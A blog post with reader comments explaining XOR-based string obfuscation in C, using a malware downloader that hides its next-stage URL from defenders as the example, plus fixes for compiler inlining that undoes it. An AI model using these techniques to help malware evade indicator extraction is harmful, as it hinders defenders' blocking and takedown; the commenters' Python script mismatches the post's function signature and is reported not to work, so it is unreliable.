DIY String obfuscation for plain C

Say you want to write a C program but avoid including plain strings in the binary. This is often called <em>string obfuscation</em>. Malware authors do it, for example, to prevent easy extraction of so-called indicators of compromise. I can also imagine a legitimate business using it to make reverse engineering of its software harder and thereby protect its intellectual property.

<span id="more-4734"></span>

<h2>Motivation</h2>

Let's stay with malware as an example use case for string obfuscation and consider a simple downloader, i.e. malware whose sole purpose is to download something from the Internet - the so-called <em>next stage</em> - and execute it on the targeted system. Let's further assume the downloader uses HTTP. This is a common choice for malware authors, probably because it blends nicely into legitimate network traffic and is easy to use: the Windows API supports HTTP natively and setting up an HTTP server is easy as pie.

Since the downloader <em>somehow</em> needs to know what to download, the URL of the next stage has to be contained in the downloader <em>somehow</em>. When the URL is included as a plain string in the binary, calling `strings malware.exe | grep http` is a very easy way to "extract" it. But the author (or, to be more precise, the operator of the malware) has an interest in making it harder to extract the URL: if I - as a defender - can extract the next-stage URL that easily, I can just block the URL (or even the domain) from resolving in my network and hence make the malware ineffective. Depending on where the next-stage URL is hosted, it may even be possible to notify the hoster of malicious activity and cause a takedown of the URL or domain.
<h2>The Naïve Approach</h2>

The most obvious approach to achieve the goal is to replace every string in the source code with a call to a function that returns the actual string. So

```c
download("http://example.com/next-stage.exe")
```

would become something like

```c
download(deobfuscate("mambojumbo123", "more arguments if needed", 123))
```

Doing this by hand is annoying, time-consuming and error-prone. So let's automate this step, i.e. call some sort of pre-processor that takes the original source code as input and outputs source code with all strings replaced by calls to the `deobfuscate` function.

But there is a problem with this approach: the original source code used a string literal, which does not need to be freed explicitly. The `deobfuscate` function, however, allocates new memory on the heap to hold the deobfuscated variant of the string. Hence the program will start to leak memory, which is unacceptable!

<h2>Don't Leak</h2>

To avoid leaking memory, we want to establish a contract with the user of this obfuscation technique, such that "protected strings" are freed after use. Let's re-implement `strdup` but give it a different name:

```c
#include <stdlib.h>
#include <string.h>

char *protect(const char *s) {
    char *ret = malloc(sizeof(char) * (strlen(s) + 1));
    if (ret == NULL) return NULL;
    strcpy(ret, s);
    return ret;
}
```

The function accepts a string as its only argument, allocates enough memory to store a copy of it and returns a pointer to this memory. The contract with the author of the C code now is that every string that should be obfuscated needs to be passed to the `protect` function. This obliges the developer to free the string after use:

```c
char *s = protect("http://example.com/next-stage.exe");
if (s != NULL) {
    download(s);
    free(s);
}
```

This also makes pattern matching for strings much easier: we can just search with a regex like this

```
protect\("([^"]+?)"\)
```

and replace each match with a call to `deobfuscate`.
<h2>Concrete Obfuscation</h2>

Up to this point, we haven't talked about a concrete implementation of the obfuscation. For starters, we will take something simple: generate a random byte array - a key - for every string to be protected and let `deobfuscate` XOR the obfuscated string with the key to get the original string back:

```c
char *deobfuscate(const char *buffer, int len, const char *key, int key_len) {
    char *ret = malloc(sizeof(char) * (len + 1));
    if (ret == NULL) return NULL;
    ret[len] = '\0';
    for (int i = 0; i < len; i++) {
        ret[i] = buffer[i] ^ key[i % key_len];
    }
    return ret;
}
```

So instead of `protect("example.com")`, the source code that gets compiled will contain something like this:

```c
deobfuscate("\x3a\xe1\x08\x12\x60\xd0\x6f\x71\xfa\x06\x12", 11, "\x5f\x99\x69\x7f\x10\xbc\x0a", 7);
```

The original source code contains only calls to `protect` and none to `deobfuscate`; the pre-processed source code with obfuscated strings contains only calls to `deobfuscate` and none to `protect`. Implementation of such a pre-processing script is left as an exercise to the reader.

<h2>The Twist</h2>

I felt pretty confident with this second approach, compiled the source code with all interesting strings obfuscated and ran `strings` on the resulting executable. To my surprise, it still contained the next-stage URL. Or at least, fragments of it. To understand what happened, I launched Ghidra (the reverse engineering tool developed by the NSA and released as open source a few months ago, which is a big deal because it basically democratized the reverse engineering community, but I digress) and threw the binary into it. The place where there should have been a call to `deobfuscate` just led to the following decompiled code:

```
BYTE *Memory = malloc(0xc);
if (Memory != NULL) {
    *(Memory + 8) = 0x6d6f63;
    *Memory = 0x2e656c706d617865;
    /* ... */
}
```

There is no call to `deobfuscate` but merely a call to `malloc`. And where do these hexadecimal numbers come from?
Taking endianness into account, the two assignments fill the 12 allocated bytes with the following content:

```
{0x65, 0x78, 0x61, 0x6d, 0x70, 0x6c, 0x65, 0x2e, 0x63, 0x6f, 0x6d, 0x00}
```

which is equivalent to the string `example.com`. And while it was harder to extract the string from the binary, this is not the intended result! What happened?

You might already have guessed that the `deobfuscate` function was inlined by the compiler as a performance optimization. This explains why the call to `deobfuscate` is gone and the call to `malloc` from <em>within</em> the function is there. The compiler also figured out that the `for` loop only depends on variables that have constant values. That makes it possible to execute the loop at compile time and just generate code that assigns the content from <em>after</em> the loop to the array.

<h2>The Solution</h2>

Disabling `-O3` optimization was not an option for me. I talked with <a href="https://blag.nullteilerfrei.de/author/tobi/">tobi</a> about this and he suggested a very simple solution: the compiler is only <em>able</em> to inline the `deobfuscate` function because it knows at compile time how `deobfuscate` is defined. Placing the function into a separate module - which is a good idea anyway to make code reuse easier - avoids the above-described optimization entirely, because the definition of `deobfuscate` only becomes available at link time, which is too late for compile-time optimizations (unless link-time optimization, e.g. `-flto`, is enabled). The result is a binary that does not contain the string in plain text anymore! Great success.

3 Replies to “DIY String obfuscation for plain C”

msn says:

2019-07-21 at 1:05 pm

There are some other options:

Turn off optimization for a certain part of the code. For GCC:

```
#pragma GCC push_options
#pragma GCC optimize ("O0")
void foo(void) {}
#pragma GCC pop_options
```

For MSVC:

```
#pragma optimize( "", off )
void foo(void) {}
#pragma optimize( "", on )
```

Do not inline. GCC:

```
void __attribute__ ((noinline)) foo() {}
```

MSVC:

```
__declspec(noinline) void foo(void) {}
```

Anvol says:

2020-02-03 at 8:49 pm

use it: python3 script.py code.c

```
import re
import sys


def byte_xor(ba1, ba2):
    # zip stops at the shorter input, so the pad must be at least as long as the text
    return bytes([_a ^ _b for _a, _b in zip(ba1, ba2)])


def encode_plaintext(plaintext):
    one_time_pad = bytes([0x01, 0x0c, 0x1e])  # put here your key
    one_time_pad *= 100  # should exceed any string in your C code
    ciphertext = byte_xor(bytes(plaintext, 'ascii'), one_time_pad)
    return ciphertext


def main(argv):
    p = re.compile(r'protect\("(.+?)"\)')  # slightly fixed
    for filepath in argv:
        with open(filepath, 'r') as content_file:
            content = content_file.read()
        for match_num, match in enumerate(p.finditer(content), start=1):
            print("Match {} was found at {}-{}: {}".format(
                match_num, match.start(), match.end(), match.group()))
            plaintext = match.group(1)
            encoded_bytes = encode_plaintext(plaintext)
            # note: emits a two-argument deobfuscate(buffer, len); the key is the fixed one above
            formatted_str = ('deobfuscate("'
                             + "".join("\\x{:02x}".format(b) for b in encoded_bytes)
                             + '", ' + str(len(encoded_bytes)) + ")")
            print(plaintext, ":encoded to:", formatted_str)
            content = content.replace(match.group(), formatted_str)
        # overwrite the input file with the obfuscated source
        with open(filepath, "w") as f:
            f.write(content)
    return 0


if __name__ == "__main__":
    main(sys.argv[1:])
```

1. Catman says:
  
  2020-12-27 at 10:45 pm
  
  Hello Anvol, thank you for your python script, unfortunately, it doesn't work.
